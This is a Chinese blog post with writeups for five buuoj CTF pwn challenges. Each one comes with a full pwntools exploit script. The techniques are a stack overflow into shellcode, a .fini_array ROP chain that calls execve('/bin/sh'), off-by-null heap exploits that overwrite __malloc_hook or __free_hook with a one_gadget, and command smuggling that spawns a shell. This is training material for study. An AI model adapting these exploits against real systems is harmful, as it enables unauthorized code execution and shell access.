buuoj Pwn writeup 271-275

最新推荐文章于 2023-08-02 15:01:30 发布
最新推荐文章于 2023-08-02 15:01:30 发布
阅读量322 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119752543
版权

271 espcially_tu_2016

在这里插入图片描述
在这里插入图片描述就是一个栈溢出。

在这里插入图片描述在这里插入图片描述

但是这个题最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。

然后做了个小实验。
setvbuf

exp

from pwn import *
context(os='linux', arch='i386',log_level='debug')
r = remote("node4.buuoj.cn",27739)
#r = process("./271")

elf = ELF("./271")
libc = ELF("./32/libc-2.23.so")

gets_plt = elf.plt['gets']
bss_addr = 0x804a060

payload = 'a' * 36 + 'a' * 8 + p32(gets_plt) + p32(gets_plt) + p32(bss_addr) + p32(bss_addr)

r.sendlineafter("What's your name?\n", payload)
r.sendlineafter("What's your favorite number?\n", "1")

r.sendline(asm(shellcraft.sh()))

r.interactive()

272 pwnable_317

在这里插入图片描述
会发现RELRO是半开的,但是其实因为这道题是静态链接,所以我们还是可以劫持.fini_array。

开始读程序。
在这里插入图片描述
我们可以任意地址写,但是长度只有0x18个字节,并不足以进行利用。
所以我们考虑劫持fini_array进行多次任意写。
然后制造rop。

但是我们要注意,这个程序的fini_array数组有两个。
在这里插入图片描述所以只能跑两个函数。

exp

from pwn import*

r = remote("node4.buuoj.cn", 29087)

context.log_level = "debug"

fini_array = 0x4B40F0
main_addr = 0x401B6D
libc_csu_fini = 0x402960
esp = fini_array + 0x10
leave_ret = 0x401C4B
ret = 0x401016
 
rop_syscall = 0x471db5
rop_pop_rax = 0x41e4af
rop_pop_rdx = 0x446e35
rop_pop_rsi = 0x406c30
rop_pop_rdi = 0x401696
bin_sh_addr = 0x4B419A
 
def write(addr,data):
    r.recv()
    r.send(str(addr))
    r.recv()
    r.send(data)
 

write(fini_array,p64(libc_csu_fini) + p64(main_addr))
 
write(bin_sh_addr,"/bin/sh\x00")
write(esp,p64(rop_pop_rax))
write(esp+8,p64(0x3b))
write(esp+16,p64(rop_pop_rdi))
write(esp+24,p64(bin_sh_addr))
write(esp+32,p64(rop_pop_rdx))
write(esp+40,p64(0))
write(esp+48,p64(rop_pop_rsi))
write(esp+56,p64(0))
write(esp+64,p64(rop_syscall))
 
write(fini_array,p64(leave_ret) + p64(ret))
 
r.interactive()

273 pwnable_secret_of_my_heart

在这里插入图片描述在这里插入图片描述
初始化
随机开了一块空间。

add
在这里插入图片描述
在读入的时候会有一个off by null在这里插入图片描述
delete
在这里插入图片描述
剩下的函数都没啥问题。

所以说白了就是一道off by null。

exp

#!usr/bin/python
from pwn import *
context.log_level = 'debug'

r = remote("node4.buuoj.cn", 29361)
elf = ELF("./273")
libc = ELF("./64/libc-2.23.so")

def add(size, sec):
	r.sendlineafter("Your choice :", str(1))
	r.sendlineafter(" : ", str(size))
	r.sendafter(" :", "a"*0x20)
	r.sendafter(" :", sec)

def show(idx):
	r.sendlineafter("Your choice :", str(2))
	r.sendlineafter("Index :", str(idx))
	
def delete(idx):
	r.sendlineafter("Your choice :", str(3))
	r.sendlineafter("Index :", str(idx))
	
	
add(0x20, "a" * 0x20)
show(0)
r.recvuntil("a"*0x20)
heap = u64(r.recv(6).ljust(8, '\x00')) - 0x10

add(0x100, "a" * 0xF0+p64(0x100))   
add(0x100, "a" * 0x20)	    
delete(1)
delete(0)
payload = "/bin/sh\x00"
payload = payload.rjust(0x28, "\x00")
add(0x28, payload)		
# delete(2)
add(0x80, "c" * 0x80)
add(0x40, "c" * 0x40)		

delete(1)
delete(2)

add(0x80, "d")		
add(0x100, "d"*0x68 + p64(0x70))	
add(0x80, "d")		

delete(2)
show(3)
r.recvuntil("Secret : ")
libc_base = u64(r.recv(6).ljust(8, '\x00'))-88-0x10-libc.symbols['__malloc_hook']# -0x3C4B78
malloc_addr = libc_base + libc.sym['__malloc_hook']
sys_addr = libc_base + libc.sym['system']
one_gadget = libc_base + 0xf02a4


delete(1)
add(0x100, "e"*0x80+p64(0)+p64(0x71))

delete(3)
delete(1)

add(0x100, "f"*0x80+p64(0)+p64(0x71)+p64(malloc_addr-0x23))
add(0x60, "f")
add(0x60, "\x00"*0x13+p64(one_gadget))

delete(3)
r.interactive()

274 bjdctf_2020_dizzy

在这里插入图片描述在这里插入图片描述

判断输入的字节是否等于v8,等于的话v8下移一个地址判断继续判断
最后如果v8指向的值不为0,就exit,否则system(command),其实还是拼凑命令。

exp

from pwn import *

context.log_level = 'debug'

	
r = remote("node4.buuoj.cn", 29056)

flag="PvvN| 1S S0 GREAT! & sh "

for i in range(6):
    a= i * 4
    r.sendline(str(u32(flag[a:a+4])-114514))

for i in range(14):
    r.sendline('174')

r.interactive()

275 ciscn_2019_final_9

在这里插入图片描述

add
在这里插入图片描述chunk大小不能大于0xf8

safe_read一点也不safe
在这里插入图片描述
有个off by null。

free
在这里插入图片描述没啥问题。

puts
在这里插入图片描述
puts也没啥问题。

所以说半天就是一个off by null。
但是问题是首先我们无法通过常规的off by null做一个overlap。主要是因为我们无法去获得地址,无论是tcache的地址还是bss地址。
那么我们平常说的off by null的overlap也好,unlink也好,用不了了。咋整?

参考了ha1vk大佬wp

首先我们通过unsorted bin的合并在chunk2的pre_size上写了个0x200.
在这里插入图片描述
然后通过off by null。
在这里插入图片描述
然后就又一样了。

exp

# -*- coding: utf-8 -*-
from pwn import*

context.log_level = "debug"

#r = process("./275")
r = remote("node4.buuoj.cn", 25194)

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc.so.6")

def add(size, content):
    r.sendlineafter("command?\n> ", "1")
    r.sendlineafter("size \n> ", str(size))
    r.sendlineafter("content \n> ", content)

def delete(index):
    r.sendlineafter("command?\n> ", "2")
    r.sendlineafter("index \n> ", str(index))
    
def show(index):
    r.sendlineafter("command?\n> ", "3")
    r.sendlineafter("index \n> ", str(index))

add(0xF0,'a'*0xF0) #0
add(0xF0,'b'*0xF0) #1
add(0xF0,'c'*0xF0) #2
#3~9
for i in range(7):
   add(0xF0,'d'*0xF0)
 
for i in range(3,10):
   delete(i)

delete(0)
delete(1)
#2放入unsorted bin,与前面合并,但是prev_size不会清空
delete(2)

#0~6
for i in range(7):
   add(0xF0,'d'*0xF0)
 
add(0xF0,'a'*0xF0) #7
add(0xF0,'b'*0xF0) #8
add(0xF0,'c'*0xF0) #9
 
#填充tcache bin
for i in range(7):
   delete(i)
#7放入unsorted bin
delete(7)
#0~6
for i in range(7):
   add(0xF0,'d'*0xF0)
 
delete(8)
add(0xF8,'off by null') #7


for i in range(7):
   delete(i)

delete(9)
#0~6
for i in range(7):
   add(0xF0,'d'*0xF0)
   
add(0xF0,'a') #8
show(7)
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one_gadget = libc_base + 0x4f322
print "libc_base = " + hex(libc_base)

add(0xF0,'b') #9与7重合
delete(0)
delete(1)
#double free
delete(7)
delete(9)

 
add(0xF0,p64(free_hook)) #0
add(0xF0,'/bin/sh') #1

add(0xF0,p64(one_gadget))


#getshell
delete(1)
 
r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
buuoj Pwn wp 1-10
yongbaoii的博客
01-09 657
01 test_your_nc 直接连上就好了。 然后 cat flag 。 02 rip ret2text. 这题多多少少有点问题。 IDA里面是这样的,但是exp一直有问题,然后试着连上直接跑,是这样的。 栈溢出到返回地址就行。 from pwn import* r = remote("node3.buuoj.cn",26737) context.log_level = "debug" system_addr = 0x401187 payload = 'a' * 23 + p64(syste
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 413
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
BUUCTF PWN-----第1题:test_your_nc
热门推荐
bing_Max的博客
08-27 1万+
buuoj-----第四题:ciscn_2019_n_1 前言 简单记录一下pwn的过程 首先checkesc ,检测文件的保护机制. 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found
BJDCTF2020 dizzy
qq_39980610的博客
08-22 309
BJDCTF2020dizzy
刷题 - BUUCTF(BUUOJ) - PWN - DAY3
qq_36902977的博客
08-02 143
buuoj/buuctf pwn 刷题
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 326
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
[pwnable] 3x17 分析与思考
Tokameine的博客
09-04 635
有点炫酷的利用方式,不得不承认,确实让我长见识了。 正文: void __fastcall __noreturn start(__int64 a1, __int64 a2, int a3) { __int64 v3; // rax int v4; // esi __int64 v5; // [rsp-8h] [rbp-8h] BYREF void *retaddr; // [rsp+0h] [rbp+0h] BYREF v4 = v5; v5 = v3; ...
PWN-PRACTICE-CTFSHOW-4
P1umH0的博客
01-16 689
PWN-PRACTICE-CTFSHOW-4BJDCTF2020-babyrouterBJDCTF2020-babystackBJDCTF2020-dizzyBJDCTF2020-encryptde stack BJDCTF2020-babyrouter 栈溢出,ret2libc # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.c
pwnable.tw 3x17 经验总结
qq_43189757的博客
10-25 957
这题涨姿势了, 学到了不少东西, 对静态链接的题目也有了一点了解 参考的wp: 和媳妇一起学pwn之3x17(不得不说这名字真的sao… , 不过文章写的挺好的 分析: 由于程序是静态编译的, 把符号表给剥离了, 所以无法直接找到main函数, 可以先观察程序的入口点start 在地址0x0000000000401A74处调用了一个函数, 而这个函数其实就是libc_start_main函数 l...
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 413
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
buuoj-Pwn-刷题记录
Do1phln的博客
10-30 306
warmup_csaw_2016 题目直接给出了函数位置,所以很明显就是要利用gets,gets参数的长度为0x40,所以我们再加上返回地址的8个字节,溢出的总长度为0x48,运行时候可以看出sub_40060D的地址就是它的名字,因此我们可以构建payload payload = b'a'*0x48+p64(0x40060D) 即可得到flag ciscn_2019_n_1 打开题目可知大致意思是main函数里面调用了一过func函数,其中要输入v1,但是要判断v2,所以就很明显是需要输入长字符串覆盖到
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 383
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 2629
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
BUUCTF pwn 四月刷题
coco的博客
04-07 803
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值